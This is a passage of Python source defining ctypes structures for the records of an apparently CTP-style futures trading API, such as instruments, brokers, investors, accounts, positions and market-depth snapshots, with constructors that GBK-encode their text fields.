        ("ExchangeProductID", c_char_Array_31),
        ("UnderlyingMultiple", c_double),
    ]

    def __init__(self, ProductID=None, ProductName=None, ExchangeID=None, ProductClass=None, VolumeMultiple=None, PriceTick=None, MaxMarketOrderVolume=None, MinMarketOrderVolume=None, MaxLimitOrderVolume=None, MinLimitOrderVolume=None, PositionType=None, PositionDateType=None, CloseDealType=None, TradeCurrencyID=None, MortgageFundUseRange=None, ExchangeProductID=None, UnderlyingMultiple=None):
        super().__init__()
        # GBK-encode the text fields; truthy values only (zero-defaults kept).
        for name, value in (
                ("ProductID", ProductID), ("ProductName", ProductName),
                ("ExchangeID", ExchangeID), ("ProductClass", ProductClass),
                ("PositionType", PositionType),
                ("PositionDateType", PositionDateType),
                ("CloseDealType", CloseDealType),
                ("TradeCurrencyID", TradeCurrencyID),
                ("MortgageFundUseRange", MortgageFundUseRange),
                ("ExchangeProductID", ExchangeProductID)):
            if value:
                setattr(self, name, value.encode("GBK"))
        # Numeric fields are stored as-is.
        for name, value in (
                ("VolumeMultiple", VolumeMultiple), ("PriceTick", PriceTick),
                ("MaxMarketOrderVolume", MaxMarketOrderVolume),
                ("MinMarketOrderVolume", MinMarketOrderVolume),
                ("MaxLimitOrderVolume", MaxLimitOrderVolume),
                ("MinLimitOrderVolume", MinLimitOrderVolume),
                ("UnderlyingMultiple", UnderlyingMultiple)):
            if value:
                setattr(self, name, value)
class Instrument(Struct):
    """ctypes structure describing an exchange instrument (contract) record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("InstrumentName", c_char_Array_21),
        ("ExchangeInstID", c_char_Array_31),
        ("ProductID", c_char_Array_31),
        ("ProductClass", c_char),
        ("DeliveryYear", c_int),
        ("DeliveryMonth", c_int),
        ("MaxMarketOrderVolume", c_int),
        ("MinMarketOrderVolume", c_int),
        ("MaxLimitOrderVolume", c_int),
        ("MinLimitOrderVolume", c_int),
        ("VolumeMultiple", c_int),
        ("PriceTick", c_double),
        ("CreateDate", c_char_Array_9),
        ("OpenDate", c_char_Array_9),
        ("ExpireDate", c_char_Array_9),
        ("StartDelivDate", c_char_Array_9),
        ("EndDelivDate", c_char_Array_9),
        ("InstLifePhase", c_char),
        ("IsTrading", c_int),
        ("PositionType", c_char),
        ("PositionDateType", c_char),
        ("LongMarginRatio", c_double),
        ("ShortMarginRatio", c_double),
        ("MaxMarginSideAlgorithm", c_char),
        ("UnderlyingInstrID", c_char_Array_31),
        ("StrikePrice", c_double),
        ("OptionsType", c_char),
        ("UnderlyingMultiple", c_double),
        ("CombinationType", c_char),
    ]
    def __init__(self, InstrumentID=None, ExchangeID=None, InstrumentName=None, ExchangeInstID=None, ProductID=None, ProductClass=None, DeliveryYear=None, DeliveryMonth=None, MaxMarketOrderVolume=None, MinMarketOrderVolume=None, MaxLimitOrderVolume=None, MinLimitOrderVolume=None, VolumeMultiple=None, PriceTick=None, CreateDate=None, OpenDate=None, ExpireDate=None, StartDelivDate=None, EndDelivDate=None, InstLifePhase=None, IsTrading=None, PositionType=None, PositionDateType=None, LongMarginRatio=None, ShortMarginRatio=None, MaxMarginSideAlgorithm=None, UnderlyingInstrID=None, StrikePrice=None, OptionsType=None, UnderlyingMultiple=None, CombinationType=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / 0.0 / "" arguments
        are not silently dropped; fields left as None keep ctypes' zero
        defaults, so existing-caller behavior is unchanged.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded;
                # numbers (and pre-encoded bytes) pass through unchanged.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class Broker(Struct):
    """ctypes structure describing a broker record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("BrokerAbbr", c_char_Array_9),
        ("BrokerName", c_char_Array_81),
        ("IsActive", c_int),
    ]
    def __init__(self, BrokerID=None, BrokerAbbr=None, BrokerName=None, IsActive=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / "" arguments
        (e.g. IsActive=0) are not silently dropped; omitted fields keep
        ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class Trader(Struct):
    """ctypes structure describing an exchange trader record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("ParticipantID", c_char_Array_11),
        ("Password", c_char_Array_41),
        ("InstallCount", c_int),
        ("BrokerID", c_char_Array_11),
    ]
    def __init__(self, ExchangeID=None, TraderID=None, ParticipantID=None, Password=None, InstallCount=None, BrokerID=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / "" arguments
        are not silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class Investor(Struct):
    """ctypes structure describing an investor account record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("InvestorID", c_char_Array_13),
        ("BrokerID", c_char_Array_11),
        ("InvestorGroupID", c_char_Array_13),
        ("InvestorName", c_char_Array_81),
        ("IdentifiedCardType", c_char),
        ("IdentifiedCardNo", c_char_Array_51),
        ("IsActive", c_int),
        ("Telephone", c_char_Array_41),
        ("Address", c_char_Array_101),
        ("OpenDate", c_char_Array_9),
        ("Mobile", c_char_Array_41),
        ("CommModelID", c_char_Array_13),
        ("MarginModelID", c_char_Array_13),
    ]
    def __init__(self, InvestorID=None, BrokerID=None, InvestorGroupID=None, InvestorName=None, IdentifiedCardType=None, IdentifiedCardNo=None, IsActive=None, Telephone=None, Address=None, OpenDate=None, Mobile=None, CommModelID=None, MarginModelID=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / "" arguments
        (e.g. IsActive=0) are not silently dropped; omitted fields keep
        ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class TradingCode(Struct):
    """ctypes structure describing an investor trading-code record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("InvestorID", c_char_Array_13),
        ("BrokerID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("ClientID", c_char_Array_11),
        ("IsActive", c_int),
        ("ClientIDType", c_char),
        ("BranchID", c_char_Array_9),
        ("BizType", c_char),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, InvestorID=None, BrokerID=None, ExchangeID=None, ClientID=None, IsActive=None, ClientIDType=None, BranchID=None, BizType=None, InvestUnitID=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / "" arguments
        are not silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class PartBroker(Struct):
    """ctypes structure describing a broker-participant mapping record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("ExchangeID", c_char_Array_9),
        ("ParticipantID", c_char_Array_11),
        ("IsActive", c_int),
    ]
    def __init__(self, BrokerID=None, ExchangeID=None, ParticipantID=None, IsActive=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / "" arguments
        (e.g. IsActive=0) are not silently dropped; omitted fields keep
        ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class SuperUser(Struct):
    """ctypes structure describing a super-user record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("UserID", c_char_Array_16),
        ("UserName", c_char_Array_81),
        ("Password", c_char_Array_41),
        ("IsActive", c_int),
    ]
    def __init__(self, UserID=None, UserName=None, Password=None, IsActive=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / "" arguments
        (e.g. IsActive=0) are not silently dropped; omitted fields keep
        ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class SuperUserFunction(Struct):
    """ctypes structure describing a super-user function-permission record.

    Char-array fields hold GBK-encoded text.
    """
    _fields_ = [
        ("UserID", c_char_Array_16),
        ("FunctionCode", c_char),
    ]
    def __init__(self, UserID=None, FunctionCode=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so an explicit "" is not
        silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char field and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class InvestorGroup(Struct):
    """ctypes structure describing an investor-group record.

    Char-array fields hold GBK-encoded text.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InvestorGroupID", c_char_Array_13),
        ("InvestorGroupName", c_char_Array_41),
    ]
    def __init__(self, BrokerID=None, InvestorGroupID=None, InvestorGroupName=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so an explicit "" is not
        silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class TradingAccount(Struct):
    """ctypes structure describing a trading-account funds record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("AccountID", c_char_Array_13),
        ("PreMortgage", c_double),
        ("PreCredit", c_double),
        ("PreDeposit", c_double),
        ("PreBalance", c_double),
        ("PreMargin", c_double),
        ("InterestBase", c_double),
        ("Interest", c_double),
        ("Deposit", c_double),
        ("Withdraw", c_double),
        ("FrozenMargin", c_double),
        ("FrozenCash", c_double),
        ("FrozenCommission", c_double),
        ("CurrMargin", c_double),
        ("CashIn", c_double),
        ("Commission", c_double),
        ("CloseProfit", c_double),
        ("PositionProfit", c_double),
        ("Balance", c_double),
        ("Available", c_double),
        ("WithdrawQuota", c_double),
        ("Reserve", c_double),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("Credit", c_double),
        ("Mortgage", c_double),
        ("ExchangeMargin", c_double),
        ("DeliveryMargin", c_double),
        ("ExchangeDeliveryMargin", c_double),
        ("ReserveBalance", c_double),
        ("CurrencyID", c_char_Array_4),
        ("PreFundMortgageIn", c_double),
        ("PreFundMortgageOut", c_double),
        ("FundMortgageIn", c_double),
        ("FundMortgageOut", c_double),
        ("FundMortgageAvailable", c_double),
        ("MortgageableFund", c_double),
        ("SpecProductMargin", c_double),
        ("SpecProductFrozenMargin", c_double),
        ("SpecProductCommission", c_double),
        ("SpecProductFrozenCommission", c_double),
        ("SpecProductPositionProfit", c_double),
        ("SpecProductCloseProfit", c_double),
        ("SpecProductPositionProfitByAlg", c_double),
        ("SpecProductExchangeMargin", c_double),
        ("BizType", c_char),
        ("FrozenSwap", c_double),
        ("RemainSwap", c_double),
    ]
    def __init__(self, BrokerID=None, AccountID=None, PreMortgage=None, PreCredit=None, PreDeposit=None, PreBalance=None, PreMargin=None, InterestBase=None, Interest=None, Deposit=None, Withdraw=None, FrozenMargin=None, FrozenCash=None, FrozenCommission=None, CurrMargin=None, CashIn=None, Commission=None, CloseProfit=None, PositionProfit=None, Balance=None, Available=None, WithdrawQuota=None, Reserve=None, TradingDay=None, SettlementID=None, Credit=None, Mortgage=None, ExchangeMargin=None, DeliveryMargin=None, ExchangeDeliveryMargin=None, ReserveBalance=None, CurrencyID=None, PreFundMortgageIn=None, PreFundMortgageOut=None, FundMortgageIn=None, FundMortgageOut=None, FundMortgageAvailable=None, MortgageableFund=None, SpecProductMargin=None, SpecProductFrozenMargin=None, SpecProductCommission=None, SpecProductFrozenCommission=None, SpecProductPositionProfit=None, SpecProductCloseProfit=None, SpecProductPositionProfitByAlg=None, SpecProductExchangeMargin=None, BizType=None, FrozenSwap=None, RemainSwap=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0.0 money amounts
        are not silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded;
                # numeric amounts pass through unchanged.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class InvestorPosition(Struct):
    """ctypes structure describing an investor position record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("PosiDirection", c_char),
        ("HedgeFlag", c_char),
        ("PositionDate", c_char),
        ("YdPosition", c_int),
        ("Position", c_int),
        ("LongFrozen", c_int),
        ("ShortFrozen", c_int),
        ("LongFrozenAmount", c_double),
        ("ShortFrozenAmount", c_double),
        ("OpenVolume", c_int),
        ("CloseVolume", c_int),
        ("OpenAmount", c_double),
        ("CloseAmount", c_double),
        ("PositionCost", c_double),
        ("PreMargin", c_double),
        ("UseMargin", c_double),
        ("FrozenMargin", c_double),
        ("FrozenCash", c_double),
        ("FrozenCommission", c_double),
        ("CashIn", c_double),
        ("Commission", c_double),
        ("CloseProfit", c_double),
        ("PositionProfit", c_double),
        ("PreSettlementPrice", c_double),
        ("SettlementPrice", c_double),
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("OpenCost", c_double),
        ("ExchangeMargin", c_double),
        ("CombPosition", c_int),
        ("CombLongFrozen", c_int),
        ("CombShortFrozen", c_int),
        ("CloseProfitByDate", c_double),
        ("CloseProfitByTrade", c_double),
        ("TodayPosition", c_int),
        ("MarginRateByMoney", c_double),
        ("MarginRateByVolume", c_double),
        ("StrikeFrozen", c_int),
        ("StrikeFrozenAmount", c_double),
        ("AbandonFrozen", c_int),
        ("ExchangeID", c_char_Array_9),
        ("YdStrikeFrozen", c_int),
        ("InvestUnitID", c_char_Array_17),
        ("PositionCostOffset", c_double),
    ]
    def __init__(self, InstrumentID=None, BrokerID=None, InvestorID=None, PosiDirection=None, HedgeFlag=None, PositionDate=None, YdPosition=None, Position=None, LongFrozen=None, ShortFrozen=None, LongFrozenAmount=None, ShortFrozenAmount=None, OpenVolume=None, CloseVolume=None, OpenAmount=None, CloseAmount=None, PositionCost=None, PreMargin=None, UseMargin=None, FrozenMargin=None, FrozenCash=None, FrozenCommission=None, CashIn=None, Commission=None, CloseProfit=None, PositionProfit=None, PreSettlementPrice=None, SettlementPrice=None, TradingDay=None, SettlementID=None, OpenCost=None, ExchangeMargin=None, CombPosition=None, CombLongFrozen=None, CombShortFrozen=None, CloseProfitByDate=None, CloseProfitByTrade=None, TodayPosition=None, MarginRateByMoney=None, MarginRateByVolume=None, StrikeFrozen=None, StrikeFrozenAmount=None, AbandonFrozen=None, ExchangeID=None, YdStrikeFrozen=None, InvestUnitID=None, PositionCostOffset=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit zero volumes /
        amounts (e.g. Position=0) are not silently dropped; omitted fields
        keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded;
                # numbers pass through unchanged.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class InstrumentMarginRate(Struct):
    """ctypes structure describing an instrument margin-rate record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("HedgeFlag", c_char),
        ("LongMarginRatioByMoney", c_double),
        ("LongMarginRatioByVolume", c_double),
        ("ShortMarginRatioByMoney", c_double),
        ("ShortMarginRatioByVolume", c_double),
        ("IsRelative", c_int),
        ("ExchangeID", c_char_Array_9),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, IsRelative=None, ExchangeID=None, InvestUnitID=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / 0.0 ratios
        (e.g. IsRelative=0) are not silently dropped; omitted fields keep
        ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class InstrumentCommissionRate(Struct):
    """ctypes structure describing an instrument commission-rate record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("OpenRatioByMoney", c_double),
        ("OpenRatioByVolume", c_double),
        ("CloseRatioByMoney", c_double),
        ("CloseRatioByVolume", c_double),
        ("CloseTodayRatioByMoney", c_double),
        ("CloseTodayRatioByVolume", c_double),
        ("ExchangeID", c_char_Array_9),
        ("BizType", c_char),
        ("InvestUnitID", c_char_Array_17),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, OpenRatioByMoney=None, OpenRatioByVolume=None, CloseRatioByMoney=None, CloseRatioByVolume=None, CloseTodayRatioByMoney=None, CloseTodayRatioByVolume=None, ExchangeID=None, BizType=None, InvestUnitID=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0.0 ratios are not
        silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class DepthMarketData(Struct):
    """ctypes structure describing a five-level depth market-data snapshot.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("InstrumentID", c_char_Array_31),
        ("ExchangeID", c_char_Array_9),
        ("ExchangeInstID", c_char_Array_31),
        ("LastPrice", c_double),
        ("PreSettlementPrice", c_double),
        ("PreClosePrice", c_double),
        ("PreOpenInterest", c_double),
        ("OpenPrice", c_double),
        ("HighestPrice", c_double),
        ("LowestPrice", c_double),
        ("Volume", c_int),
        ("Turnover", c_double),
        ("OpenInterest", c_double),
        ("ClosePrice", c_double),
        ("SettlementPrice", c_double),
        ("UpperLimitPrice", c_double),
        ("LowerLimitPrice", c_double),
        ("PreDelta", c_double),
        ("CurrDelta", c_double),
        ("UpdateTime", c_char_Array_9),
        ("UpdateMillisec", c_int),
        ("BidPrice1", c_double),
        ("BidVolume1", c_int),
        ("AskPrice1", c_double),
        ("AskVolume1", c_int),
        ("BidPrice2", c_double),
        ("BidVolume2", c_int),
        ("AskPrice2", c_double),
        ("AskVolume2", c_int),
        ("BidPrice3", c_double),
        ("BidVolume3", c_int),
        ("AskPrice3", c_double),
        ("AskVolume3", c_int),
        ("BidPrice4", c_double),
        ("BidVolume4", c_int),
        ("AskPrice4", c_double),
        ("AskVolume4", c_int),
        ("BidPrice5", c_double),
        ("BidVolume5", c_int),
        ("AskPrice5", c_double),
        ("AskVolume5", c_int),
        ("AveragePrice", c_double),
        ("ActionDay", c_char_Array_9),
    ]
    def __init__(self, TradingDay=None, InstrumentID=None, ExchangeID=None, ExchangeInstID=None, LastPrice=None, PreSettlementPrice=None, PreClosePrice=None, PreOpenInterest=None, OpenPrice=None, HighestPrice=None, LowestPrice=None, Volume=None, Turnover=None, OpenInterest=None, ClosePrice=None, SettlementPrice=None, UpperLimitPrice=None, LowerLimitPrice=None, PreDelta=None, CurrDelta=None, UpdateTime=None, UpdateMillisec=None, BidPrice1=None, BidVolume1=None, AskPrice1=None, AskVolume1=None, BidPrice2=None, BidVolume2=None, AskPrice2=None, AskVolume2=None, BidPrice3=None, BidVolume3=None, AskPrice3=None, AskVolume3=None, BidPrice4=None, BidVolume4=None, AskPrice4=None, AskVolume4=None, BidPrice5=None, BidVolume5=None, AskPrice5=None, AskVolume5=None, AveragePrice=None, ActionDay=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit zero prices /
        volumes (e.g. Volume=0, UpdateMillisec=0) are not silently dropped;
        omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded;
                # prices/volumes pass through unchanged.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class InstrumentTradingRight(Struct):
    """ctypes structure describing an instrument trading-right record.

    Char-array fields hold GBK-encoded text.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("TradingRight", c_char),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, TradingRight=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so an explicit "" is not
        silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char field and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class BrokerUser(Struct):
    """ctypes structure describing a broker-user record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("UserName", c_char_Array_81),
        ("UserType", c_char),
        ("IsActive", c_int),
        ("IsUsingOTP", c_int),
        ("IsAuthForce", c_int),
    ]
    def __init__(self, BrokerID=None, UserID=None, UserName=None, UserType=None, IsActive=None, IsUsingOTP=None, IsAuthForce=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 flags (e.g.
        IsActive=0, IsUsingOTP=0) are not silently dropped; omitted fields
        keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class BrokerUserPassword(Struct):
    """ctypes structure describing a broker-user password record.

    Char-array fields hold GBK-encoded text.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("Password", c_char_Array_41),
        ("LastUpdateTime", c_char_Array_17),
        ("LastLoginTime", c_char_Array_17),
        ("ExpireDate", c_char_Array_9),
        ("WeakExpireDate", c_char_Array_9),
    ]
    def __init__(self, BrokerID=None, UserID=None, Password=None, LastUpdateTime=None, LastLoginTime=None, ExpireDate=None, WeakExpireDate=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so an explicit "" is not
        silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class BrokerUserFunction(Struct):
    """ctypes structure describing a broker-user function-permission record.

    Char-array fields hold GBK-encoded text.
    """
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("UserID", c_char_Array_16),
        ("BrokerFunctionCode", c_char),
    ]
    def __init__(self, BrokerID=None, UserID=None, BrokerFunctionCode=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so an explicit "" is not
        silently dropped; omitted fields keep ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char field and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class TraderOffer(Struct):
    """ctypes structure describing a trader connection/offer status record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("ExchangeID", c_char_Array_9),
        ("TraderID", c_char_Array_21),
        ("ParticipantID", c_char_Array_11),
        ("Password", c_char_Array_41),
        ("InstallID", c_int),
        ("OrderLocalID", c_char_Array_13),
        ("TraderConnectStatus", c_char),
        ("ConnectRequestDate", c_char_Array_9),
        ("ConnectRequestTime", c_char_Array_9),
        ("LastReportDate", c_char_Array_9),
        ("LastReportTime", c_char_Array_9),
        ("ConnectDate", c_char_Array_9),
        ("ConnectTime", c_char_Array_9),
        ("StartDate", c_char_Array_9),
        ("StartTime", c_char_Array_9),
        ("TradingDay", c_char_Array_9),
        ("BrokerID", c_char_Array_11),
        ("MaxTradeID", c_char_Array_21),
        ("MaxOrderMessageReference", c_char_Array_7),
    ]
    def __init__(self, ExchangeID=None, TraderID=None, ParticipantID=None, Password=None, InstallID=None, OrderLocalID=None, TraderConnectStatus=None, ConnectRequestDate=None, ConnectRequestTime=None, LastReportDate=None, LastReportTime=None, ConnectDate=None, ConnectTime=None, StartDate=None, StartTime=None, TradingDay=None, BrokerID=None, MaxTradeID=None, MaxOrderMessageReference=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / "" arguments
        (e.g. InstallID=0) are not silently dropped; omitted fields keep
        ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class SettlementInfo(Struct):
    """ctypes structure describing an investor settlement-information record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("TradingDay", c_char_Array_9),
        ("SettlementID", c_int),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("SequenceNo", c_int),
        ("Content", c_char_Array_501),
        ("AccountID", c_char_Array_13),
        ("CurrencyID", c_char_Array_4),
    ]
    def __init__(self, TradingDay=None, SettlementID=None, BrokerID=None, InvestorID=None, SequenceNo=None, Content=None, AccountID=None, CurrencyID=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / "" arguments
        (e.g. SequenceNo=0) are not silently dropped; omitted fields keep
        ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class InstrumentMarginRateAdjust(Struct):
    """ctypes structure describing an instrument margin-rate adjustment record.

    Char-array fields hold GBK-encoded text; numeric fields map directly
    onto the underlying C layout.
    """
    _fields_ = [
        ("InstrumentID", c_char_Array_31),
        ("InvestorRange", c_char),
        ("BrokerID", c_char_Array_11),
        ("InvestorID", c_char_Array_13),
        ("HedgeFlag", c_char),
        ("LongMarginRatioByMoney", c_double),
        ("LongMarginRatioByVolume", c_double),
        ("ShortMarginRatioByMoney", c_double),
        ("ShortMarginRatioByVolume", c_double),
        ("IsRelative", c_int),
    ]
    def __init__(self, InstrumentID=None, InvestorRange=None, BrokerID=None, InvestorID=None, HedgeFlag=None, LongMarginRatioByMoney=None, LongMarginRatioByVolume=None, ShortMarginRatioByMoney=None, ShortMarginRatioByVolume=None, IsRelative=None):
        """Assign every argument that is not None; str values are GBK-encoded.

        Uses `is not None` (not truthiness) so explicit 0 / 0.0 ratios
        (e.g. IsRelative=0) are not silently dropped; omitted fields keep
        ctypes' zero defaults.
        """
        super().__init__()
        given = locals()
        for field, _ctype in self._fields_:
            value = given.get(field)
            if value is not None:
                # str targets a char array and must be GBK-encoded.
                setattr(self, field, value.encode("GBK") if isinstance(value, str) else value)
class ExchangeMarginRate(Struct):
    """Exchange margin-rate record. Fields are assigned only for truthy
    arguments; text arguments are stored GBK-encoded."""
    _fields_ = [
        ("BrokerID", c_char_Array_11),
        ("InstrumentID", c_char_Array_31),
        ("HedgeFlag", c_char),
